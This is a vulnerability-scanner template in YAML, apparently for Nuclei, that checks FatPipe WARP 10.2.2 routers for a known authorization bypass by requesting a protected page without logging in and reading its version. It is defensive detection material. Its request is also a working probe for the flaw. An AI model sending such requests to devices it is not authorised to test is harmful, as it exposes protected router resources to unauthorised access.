id: fatpipe-auth-bypass

info:
  name: FatPipe WARP 10.2.2  - Authorization Bypass
  author: gy741
  severity: high
  description: FatPipe WARP 10.2.2 contains an authorization bypass vulnerability. Improper access control occurs when the application provides direct access to objects based on user-supplied input. As a result, an attacker can bypass proper authorization and access resources behind protected pages.
  reference:
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5682.php
    - https://www.fatpipeinc.com/support/advisories.php
  tags: fatpipe,auth-bypass,router

requests:
  - raw:
      - |
        GET /fpui/jsp/index.jsp HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "productType"
          - "type:"
          - "version:"
          - "<title>FatPipe Networks</title>"
        condition: and

    extractors:
      - type: regex
        part: body
        regex:
          - 'version: "([0-9.a-z]+)"'

# Enhanced by md on 2022/10/19
